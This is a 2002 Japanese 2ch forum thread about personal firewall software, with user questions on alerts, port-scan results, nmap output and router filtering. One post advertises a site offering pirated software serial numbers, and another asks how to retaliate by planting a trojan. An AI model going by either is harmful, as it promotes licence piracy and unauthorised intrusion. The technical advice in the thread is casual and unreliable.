808名無しさん@お腹いっぱい。:02/02/02 22:37
Sygateでタスクトレイにあるアイコンが
通常の通信のときは水色に光ってるんですが、
たまに赤くなるときがあります。
どんな時に赤くなるのでしょうか?
809名無しさん@お腹ゲフー:02/02/02 23:01
今さらノートンインターネットセキュリティ2001入れたら、起動時にCドライブやDドライブの
フォルダが開きます。どっちかだけ開く時もあれば、開かない時が。
なんなんでしょ??


810796:02/02/03 00:09
>>806
ありがとう
↑マルチ
812 :02/02/03 00:49
>>805
NetmeetingはインバウンドのUDPの接続がネックになって
設定が難しいです。一度挑戦して相手の画面は見えたことがあるのですが
声は聞こえませんでした。

↓ここ参考になりませんか?
http://www.ok96.co.jp/users/hidexpro/nm/nmlan.html

以前挑戦したときはいまいちよく理解できないまま設定しましたが
ひょっとすると、一部のUDPでアプリケーション指定してはいけないのが
あるのかもしれません。
>>810-811
マルチポストありがとうにチョットワロタ。
814名無しさん@お腹いっぱい。:02/02/03 22:40
ageee
815名無しさん@お腹いっぱい。:02/02/04 01:23
んでさー、とりあえずぞぬのプログラムで。
service and controller appって何?
w2kなんだけどトロイってこと?
なんでもかんでもトロイとほざくやつが多いな ちっとは自分で調べろ
817名無しさん@お腹いっぱい。:02/02/04 20:41
Sygateってポートスキャン等の警告のダイアログって
表示されないのですか?
プリーズティーチミー
818sage:02/02/05 01:05
自分でポーと好きゃんしてみる。
819817:02/02/05 20:52
ポートスキャンツールがありません
ブラウザの件ですが、
オペラっていつになったら、
日本語版でるのでしょうか?
IEより安全かなって思っているのですが。
正式版登場!新鋭ブラウザ Opera Ver.4
http://pc.2ch.net/test/read.cgi/win/1008954552/
>>822
すみませんでした。
逝ってきます。
>>819
月刊マガジンの裏表紙の通販にノッテタYO!
ワラータ
826名無しさん@お腹いっぱい。:02/02/06 00:47
WinXP環境ではどのFWがいいの?
多重ログオンしてる場合、別のログオンセッションにAsk?の画面が出ちゃって、
Outpostは使いにくかったけど。
>825
サンクス-コ :P

ところでTiny新版出るね
ドキドキ。。。危ない予感。
ゾネは重い&エラータ続出だし
黒氷は穴ハケーン(・∀・)!だし
ドイツ野郎嫌いだし
災ゲトはどっちつかずだし(Tinyよか重いのがヤ)
Tinyだけが頼りなのよ
ドキドキ。。。
いざとなったらみんな災ゲトに雪崩れ込むんかな?
自己レス
黒氷はIDSだし、
穴っつってもPFWと併用でなんとかなるよね
すまそ
829名無しさん@お腹いっぱい。:02/02/06 04:49
ワクワクだよ だからあげ
830名無しさん@お腹いっぱい。:02/02/06 07:53
ここでやったら
http://scan.sygatetech.com/trojanscan.html
Trojan 80 OPEN Executor, RingZero
ってでた。これってトロられてるの?
831名無しさん@お腹いっぱい。:02/02/06 17:37
会社でも使っていいのはどのFW?
それはさすがに会社の管理者以外知らんだろ。
>>830
違う。単にオープンだったポートを
http://scan.sygatetech.com:443/cgi-bin/probe/trojans.cgi
の組み合わせで報告してるだけだよ。
834名無しさん@お腹いっぱい。:02/02/06 19:45
sygateインスト成功したんだけど、somebody is scanning your computor
って出ているんだけど、
>>834
だけど?
836834:02/02/06 19:54
SCANに掛けても別に異常はないのに
そういう表示が出るのってなんなの?
837834:02/02/06 20:07
問題解決
 
839名無しさん@お腹いっぱい。:02/02/07 03:10
XPとウィルスバスターのFWはどっちの方が性能上なんでしょうか?
細かい設定はXPのフィルタリングのほうが出来るけどね。
841名無しさん@お腹いっぱい。:02/02/07 10:09
521 名前:いづれもW2Ksp2 投稿日:02/02/07 09:52
ZoneAlarm(最新版)は、MSNメッセンジャーの音声チャットを妨害することが
検証されました。
ZoneAlarm(最新版)は、ビットアリーナの着信を妨害する疑いがあることが
確認されました
842名無しさん@お腹いっぱい。:02/02/07 13:10
Outpostっていいよにゃぁ。
843名無しさん@お腹いっぱい。:02/02/07 13:23
窓の杜にも紹介されてるけど、
XP使ってて、マルチユーザ機能しょっちゅう使うから、OutPostはちょと使いづらい。
結局ZAで落ち着き。
>>841
細かく設定できるPFWに変えればよい。
UDPの外からの投げっぱなしパケットは攻撃とみなされて遮断してしまうだろうな。
845名無しさん@お腹いっぱい。:02/02/07 18:09
コレガのルーターを使ってて、OSはwinxpのhomeなんですけど、
tinyでもSygateでもノートンでも、firewallを使わなくても
http://scan.sygatetech.com/prequickscan.html
↑ではICMP以外がclosedでICMPがopenです。
これはルーターを使ってるからでしょうか?
勿論いろいろ設定したんですが・・・
それとも、ちゃんと調べて設定しろヴォケですか?
846845:02/02/07 18:13
ちなみに、ルーターは簡易firewall付きです。
firewallソフトありでも無しでも結果が変わらないなんて、
自分の設定がまずいのかなと思いました。
>>845
でしょうね。
その簡易Firewallがどんなものか分からないので詳しくは分からないけど。
848名無しさん@お腹いっぱい。:02/02/07 22:05
>>845

おれは厨房だけど、訳も分からず、Tinyとメルコのルーター(エアーステーション)を使っている。
ルーターはデフォルトだ。
おれも845のセキュリティチェックを試してみた。
すると、「80」、「113」は「CLOSED」
ICPMは、「OPEN」だった。
そのほかはすべてブロックした。
どうすれば、ICPMがブロックできるかなぁ。
849名無しさん@お腹いっぱい。:02/02/07 22:18
850はぁ?:02/02/07 22:18
>>848
知らないふりして聞くのはDOSと同じ

↓お前だろ↓
http://pc.2ch.net/test/read.cgi/sec/1006859839/879
851 :02/02/07 22:19
ここにもあったYO!
http://asian.elitecities.com/books/value.html
852845:02/02/07 23:48
>>847
やっぱりルータ側の問題だったみたいです。
>>849
四苦八苦してファームウェアを更新して、ステルスモードを有効にしてみたところ、
http://scan.sygatetech.com/prequickscan.html
↑ではfirewall無しで、closedからICMPを含め全てBlockedに、
https://grc.com/x/ne.dll?bh0bkyd2
こちらでは全てStealthになりました!
849さん、本当にありがとうございました!
>>844
フリーの、他のPFW、どうか紹介してください
おねがいします
>>853
>>2 & >>3のFirewall 解説サイト
855名無しさん@お腹いっぱい。:02/02/08 23:21
なんかオープンソースなWindowsで使えるFWないですかねぇ。
857名無しさん@お腹いっぱい。:02/02/10 00:00
Sygate Personal Firewall を常用している人います?
スレ立ってるのが見えんのか
SygatePersonalFireWall
http://pc.2ch.net/test/read.cgi/sec/993936202/
859794:02/02/10 00:07
http://www.puchiwara.com/hacking/
                / jjjj     ___
              / ノ       {!!! _ ヽ、
             ,/  ノ        ~ `、  \
             `、  `ヽ.    人  , ‐'`  ノ
 キタ━━━━━━━  \  `ヽ (゚∀゚)" .ノ/━━━━━━━━━!!!!
                `、ヽ.  ``Y"   r '
                  i. 、   ¥   ノ
                  `、.` -‐´;`ー イ
                    i 彡 i ミ/
                  /     `\
                 /   /ヽ、  ヽ
作者かも。 


宣伝うざい。
861名無しさん@お腹いっぱい。:02/02/10 01:37
>>855
さすがにオープンソースのはないだろう。
http://mentai.2ch.net/test/read.cgi/accuse/1013274655/
500 :夜勤 ★ :02/02/10 03:37 ID:???
まぁ 100Mbps で、どれだけのリクエストがあるか
わかりませんが、当然すごーくたくさんのリクエストがあるわけで、
多分 fire wall の導入だけで、1000万以上はかかるかと、
規模を見積もって見なきゃわかりませんが、
863 :02/02/10 21:50
864 :02/02/12 07:56
  
865名無しさん@お腹いっぱい。:02/02/12 08:00
BlackICE Defender 評価版 2.5coJE使ってるんですけど
アタックしてくる奴で注意レベルの警報って気にしなくてもよいですか
BlackICE Defenderの2.9ってヤヴァイな
俺もBID使い始めて間もないんだけどアタックを検知してタスクトレイで
ピコピコしてる状態・・・これはほっといてもいいの?
俺はいちいちBIDウィンドウをアクティブにしてピコピコを止めてるんだけど・・・
>>867
ピコピコしないように設定すればいい。ちなみに音も消せば静かで(・∀・)イイ!
869867:02/02/12 17:28
なるほど、こんな簡単なことでしたね。
厨でスマソ
870 :02/02/12 19:45
 
871 :02/02/17 05:45
 
872名無しさん@お腹いっぱい。:02/02/18 11:40
>>841
ZoneAlarm(最新版)は、MSNメッセンジャーの音声チャットを妨害することが
検証されました。
ZoneAlarm(最新版)は、ビットアリーナの着信を妨害する疑いがあることが
確認されました

Sygate Personal Firewall 4 に入れ替えると、
・MSNメッセンジャーの音声チャットができるようになったこと
が検証されました。
MSMなんざ使わねーし(w
MSMってどんなプレイ?M二人にS一人?ハァハァ・・・
875 :02/02/20 17:24
 
876名無しさん@お腹いっぱい。:02/02/21 01:18
又、トロイの木馬をローカルコンピューターに仕掛けようとされた。
いったい誰なんでしょう・・・・トロイの木馬って私もやりかえしたいんですが
簡単にできるものなんでしょうか?それから未使用ポートを遮断したとかいうのも
よくでてくるんですが、これはいったいなんなんでしょうか?
213.204.132.102にトロイの木馬を仕掛けられました。
今、初めて防火壁入れたんですけど、起動したらいきなり進入が…
もしかしてかなり進入されてた?kerioのお陰で助かりました…
>>876
や、やりかえしたい????素人のくせに気丈だね。
うぐぅ お願いだよ。tiny3.0出して。
>>879
もう出ないって事に俺のなかではケテーイ
881 :02/02/22 01:01
 
882 :02/02/22 18:39
   
883テプコ:02/02/23 01:10
尻集 最新版
http://goodshop2002.mariansela.com/

ソースコードの最後の方にヒントが・・・・
JPEG偽装

ウイルスバスターの尻もあり。
884 :02/02/23 21:50
どなたか、重さで順位をつけてください。
885適当:02/02/23 22:44
1. NIS
2. ZoneAlarm
3. Sygate
4. BlackICE
5. Tiny/Kerio

添削よろしく
886884:02/02/24 00:27
NIS2001使ってて今Sygateだけど、
Tinyか…
887 :02/02/24 14:39
 
>>885
9x系ならリソース占有率も気になるところだね。
889855:02/02/24 17:08
ていうかこれ>>885、ZAとTinyしか使用したことのない俺が
適当に勘で書いてみたんだけど合ってるの?
この板で色々読んでて多分こんな感じだろうなーって書いただけよ。
890名無しさん@お腹いっぱい。:02/02/24 17:53
>>888
9x系なら間違いなくTinyだろう。
軽くて、リソースを食わない。
Kerioもリソース食わない。
まあ、元がTinyだから当然だけど。
892884:02/02/24 20:45
>>890
WIN2000などのNT系OSでもやっぱりTinyですか?
自分が使った感じだと違いがわからなかったもんで。
あっ!違いがわからないなら見た目でいいのか。
でも潜在的な負荷が知りたいです。
893 :02/02/25 02:54
 
ルーターのポートフィルタリング+ノートン アンチウィルス+XPのPFW
で結構いけると思うのだがどうだろう?
軽さという点ではXPのPFWはどうなのだろう?
895 :02/02/25 04:40
ポートフィルタリングとはいわない
フィルタされるのはパケットだから
896ふー:02/02/25 04:55
ここ、初めて見てます。
ちょっと、質問です。
ルーターでパケットフィルタを設定してあれば、
パーソナルFWっていらないというか、大丈夫なんですよね?
つまり、ルーターとパーソナルFWで防げるものってダブっているって
思っているんですけどこれって正しいですよね?
897 :02/02/25 05:05
機能的にはそうだけどアプリごとに許可とかできるFWも
結構便利だよ
898 :02/02/25 23:30
 
>>897
というより、ルータではアプリケーションによるフィルタリングが
できないので、たまたま許可したポートがトロイの通信ポートだったら
トロイの通信も許可することに。
だからよーするに
ルーターとパーソナルFWで防げるものはダブっていないのだ
901 :02/02/26 00:50
omae ha bakabon no papa ka!
PC上のFWと連動できるルータって無い?
PC上で特定のアプリを起動している間だけ
ルータの特定のポートを開けておくようなことのできるシステム。
903↑竹下登:02/02/26 14:47
言葉明瞭、意味不明瞭
>>903
懐かしいな!思い出したくもないけど
>>46 >>50
そういう報告もあるね。
とりあえずうちはWinXPのICSホストで使えてるよー
Win2KのときもOKだった。
ぞねと違ってアンインストでトラブるってのは聞かないから、
入れてみて動かないようなら他のに乗り換えるってのも手かも。

>>50
いや、ふつーICSって言うからOK♪
   
    ☆★☆★  8ヶ月  ☆★☆★
907905:02/02/26 23:25
いいかんじ♪
908 :02/02/26 23:47
 
>>902
「UPnP」 で調べてみな♪
910 :02/02/27 14:51
 
911 :02/02/28 00:03
 
912 :02/03/01 01:37
 
人力防火壁『トメさん』 コバヤシ和夫 500円 ってどーよ?
914名無しさん@お腹いっぱい。:02/03/01 11:45
Tiny Personal Firewallをダウンロードしたいんだが
厨でどれがソフトかもわからん。。。。。
たのむ誰かおせーて

916名無しさん@お腹いっぱい。 :02/03/01 15:24
Starting nmap V. 2.54BETA22 ( www.insecure.org/nmap/ )
Interesting ports on (210.161.139.162):
(The 1527 ports scanned but not shown below are in state: closed)
Port State Service
23/tcp filtered telnet
25/tcp open smtp
81/tcp open hosts2-ns
110/tcp open pop-3
135/tcp open loc-srv
139/tcp open netbios-ssn
199/tcp filtered smux
443/tcp open https
445/tcp open microsoft-ds
1025/tcp open listen
1030/tcp open iad1
1433/tcp open ms-sql-s
5800/tcp open vnc
5900/tcp open vnc
8081/tcp open blackice-icecap


Nmap run completed -- 1 IP address (1 host up) scanned in 16 seconds

これってセキュリティ弱いですか?
917名無しさん@お腹いっぱい。:02/03/01 15:31
>>916
うん、かなり貧弱だよ、そんな貴方は今日発売のノートン2002の
新製品ノートン2002プロフェッショナルを買うべし
おせっかいなノートン先生よりも、質実剛健なZonealarmの方が好き。
Zonealarmは糞とか言うけど、どこが悪いの?
リソース食う→重い→不安定→怪しいのクアトロコンボ
機能はまあまあとして、Killerアプリのおまけ付き
あのゴテゴテしたウィンドウ見て高倉健は想像できん
>>919
言ってることは良いと思うけど、本当に使いこなしていた?って
聞きたくなるなぁ・・・・まぁ、どうでもいいからsage
921918:02/03/01 20:50
うう、反論できん。でも好きだ。

>あのゴテゴテしたウィンドウ見て高倉健は想像できん
自分は渥美清を想像するけど。

まぁノートンの弾よけくらいにはなるでしょう。
それだけでも入れてる価値があるということでage。
お、おい、、、ネタだろ?
ネタだよな・・・。
ノートンとZoneだよ?
923名無しさん@お腹いっぱい。:02/03/05 23:55
 
924名無しさん@お腹いっぱい。:02/03/05 23:59
Kerio入れろよ
925名無しさん@お腹いっぱい。:02/03/06 00:01
>>914
TINYからKerioになったんだよ
http://www.kerio.com/parser/mainpage.php?id=209&lg=1
Kerioって名前ださっ!!
927名無しさん@お腹いっぱい。:02/03/06 00:02
>>926
ケロケロケロッピーを馬鹿にしてるな?
928名無しさん@お腹いっぱい。:02/03/06 00:04
ノートン入れてZONE入れて意味あるの?
>>928
意味なし
930名無しさん@お腹いっぱい。:02/03/06 00:11
The firewall has blocked Internet access to your computer (HTTP) from 210.171.30.18 (TCP Port 4282) [TCP Flags: S].
931名無しさん@お腹いっぱい。:02/03/06 00:14
>>929
そうですか

ZONEはシンプルで好きでしたが
おさらばします
>>931
ノートンとおさらばしてもいいけどね。
933名無しさん@お腹いっぱい。:02/03/06 00:28
Tiny入れたら、2chへ書き込むときに「公開PROXY規制中」って出るんですけど、
これを回避するには、どう設定を変えたら良いんですか?
934名無しさん@お腹いっぱい。:02/03/06 00:35
結局どれが安心なんだ?!ノートンが優勢みたいだけど売り上げは
VBが上だし!!
935名無しさん@お腹いっぱい。 :02/03/06 00:42
210.250.22.100:4074
こいつがport22をツンツンしてくるのですが、いったい何をしたいのでしょうか。
たしかsshだったと思うんですが、何を仕掛けてくるつもりなのか、どなたかご教授お願いします。
936cheshire-cat:02/03/06 00:42
>>934
PFWの機能は、Nortonの方が上。ずっと。
アンチウイルスソフトとしての機能は、対応するウイルスのタイプというか分布みたいのが微妙に異なるんで何ともいえない。
>>934
まかひー以外(バスターも最近安定してきたし)
939935:02/03/06 00:52
>>938
レスありがとうございます。
telnetに代わるリモート操作に関係するプロトコルらしいことはわかっていたのですが、
そのポートにアクセスがあったということは、他人のPCをリモート操作しようとしていた
と判断してよいのでしょうか。

日付: 02/03/06 時刻: 0:45:58
規則 Backdoor/SubSeven トロイの木馬のデフォルト遮断 のセキュリティ警告を表示しました
リモートコンピュータ (80.133.157.44、)
----------------------------------------------------------------
The firewall has blocked Internet access to your computer
(TCP Port) from 80.133.157.44

Time: 02/03/06 0:45:58

zoneとinternet security入れてたら同時に反応してくれました。
見ていた面白かったです。以上。それだけ。
見ていて
943名無しさん@お腹いっぱい。:02/03/06 01:41
944名無しさん@お腹いっぱい。:02/03/06 16:00
ブラックアイスはIDSも防げるからいいよって言われたんですが
ノートンにその機能はないんですか?
945じょ:02/03/06 16:26
マカフィー良いよ
946名無しさん@お腹いっぱい。:02/03/06 16:41
ほんと?
どうして?
947名無しさん@お腹いっぱい。:02/03/06 17:05
>>944
ノートンインターネットセキュリティ2002プロフェッショナル
948名無しさん@お腹いっぱい。:02/03/07 10:01
ここから毎日不正アクセスされるよ。
でも、いつもブロックしましたって、出るんだけどなんだか不安。
しかし、そのまま放置。どうやら相手はオランダのISPを使っているようだ。
ttp://www.apnic.net/db/dbcopyright.html
949名無しさん@お腹いっぱい。:02/03/07 15:04
Outpostはどうです?
http://www.agnitum.com/
IDSを防ぐの??????
952初心者:02/03/08 01:20
さっきMcafeeのPFW入れたら、
さっそくWindows\system32の中の、
alg.exe(Application Layer Gatway Servise)というのと
lsass.exe(LSA Shell)というのが検知されました。
これって何ですか?
>>952
ファイル名分かってんだし、まずてめえで検索するなりしてくださいませ。
さっき2ch開いたら、
セキュ板の中のFW総合スレッドで、
 OSも種別も書かない(しかもHNが初心者)
 過去ログも読まない(しかもアプリの名前がそのまんまなのに考えようともしてない)
という奴が検出されました。
これって何ですか?
955そろそろ・・・:02/03/08 04:34
まもなくここは 乂1000取り合戦場乂 となります。

      \∧_ヘ     / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
 ,,、,、,,, / \〇ノゝ∩ < 1000取り合戦、いくぞゴルァ!!       ,,、,、,,,
    /三√ ゚Д゚) /   \____________  ,,、,、,,,
     /三/| ゚U゚|\      ,,、,、,,,                       ,,、,、,,,
 ,,、,、,,, U (:::::::::::)  ,,、,、,,,         \オーーーーーーーッ!!/
      //三/|三|\     ∧_∧∧_∧ ∧_∧∧_∧∧_∧∧_∧
      ∪  ∪       (    )    (     )   (    )    )
 ,,、,、,,,       ,,、,、,,,  ∧_∧∧_∧∧_∧ ∧_∧∧_∧∧_∧∧_∧
      ,,、,、,,,       (    )    (    )    (    )    (    )

>>955
1000取り合戦の前に・・・・
次スレの名前決めて立てようよ。

じゃぁ、970の人が立てるって事でひとつよろしく。
955のAAが出てるのにこれだけ盛り上がらないスレもめずらしいな(w
958名無しさん@お腹いっぱい。:02/03/08 23:14
2ちゃんねらーの力で子供達を救おうよ(連日連夜 祭り開催中!)
何処の板から来たかを明記してくれると、みんなのやる気が上がります!
【クリック】 押してみっかな【クリック】http://live.2ch.net/test/read.cgi/festival/1015502074/l50
これを見て少しでも協力する気になった人
この文を色々な板にコピペしてくれると助かります
  
>>958
最後の1行、チェーンメールみたいで感じ悪いよ。
タイトル案
ファイアーウォールソフト総合スレ [不正浸入ブロック3回目]
961名無しさん@お腹いっぱい。:02/03/09 10:52
>>957
"子供は居ない"んぢゃネーノ?
962名無しさん@お腹いっぱい。:02/03/09 14:36
Kerio正式版になりました。
963名無しさん@お腹いっぱい。:02/03/12 08:45
結局次スレは立たないの?
964名無しさん@お腹いっぱい。:02/03/12 10:21
>じゃぁ、970の人が立てるって事でひとつよろしく。
970には、なりたくナイ
965
967埋め立て屋:02/03/16 11:05
ファイアーウォールソフト 総合スレッド Part3
http://pc.2ch.net/test/read.cgi/sec/1016238340/1-4
968埋め立て屋:02/03/21 04:06
 
969埋め立て屋:02/03/21 04:07
  
970埋め立て屋:02/03/21 04:07
   
971埋め立て屋:02/03/21 07:00
 
972埋め立て屋:02/03/21 07:00
  
973埋め立て屋:02/03/21 16:13
974埋め立て屋:02/03/21 16:13
975埋め立て屋:02/03/21 18:33
976埋め立て屋:02/03/21 18:33
977埋め立て屋:02/03/21 20:26
ファイアーウォールソフト 総合スレッド Part3
http://pc.2ch.net/test/read.cgi/sec/1016238340/1-4
978埋め立て屋:02/03/21 21:08
979埋め立て屋:02/03/21 21:08
980埋め立て屋:02/03/21 21:08
981埋め立て屋:02/03/21 21:09
ファイアーウォールソフト 総合スレッド Part3
http://pc.2ch.net/test/read.cgi/sec/1016238340/
982名無しさん@お腹いっぱい。:02/03/24 13:44
h
983名無しさん@お腹いっぱい。:02/03/24 15:28
「1000取りはsageでやる」(そして出来るだけ単文)
は2ch全板のマナー
ぱちもそって何?
986名無しさん@お腹いっぱい。:02/03/24 18:47
a
987 :02/03/24 19:50
1000 
9881000:02/03/24 19:51
さげ
ファイアーウォールソフト総合スレッド Part3 http://pc.2ch.net/test/read.cgi/sec/1016238340/
990名無しさん@お腹いっぱい。:02/03/24 20:35
1000ゲット
991名無しさん@お腹いっぱい。:02/03/24 20:35
ブー高木降臨
992名無しさん@お腹いっぱい。:02/03/24 20:35
こんぺいとう下さい
993名無しさん@お腹いっぱい。:02/03/24 20:36
裸一貫
994名無しさん@お腹いっぱい。:02/03/24 20:36
>>45はネギ
995名無しさん@お腹いっぱい。:02/03/24 20:36
俺はマクビティ
996名無しさん@お腹いっぱい。:02/03/24 20:37
俺の座右の銘

酒池肉林
997名無しさん@お腹いっぱい。:02/03/24 20:37
10000000げtttttttttttttっと
998名無しさん@お腹いっぱい。:02/03/24 20:37
ネギが好き
999名無しさん@お腹いっぱい。:02/03/24 20:38
おい
1000名無しさん@お腹いっぱい。:02/03/24 20:39
10011001
このスレッドは1000を超えました。
もう書けないので、新しいスレッドを立ててくださいです。。。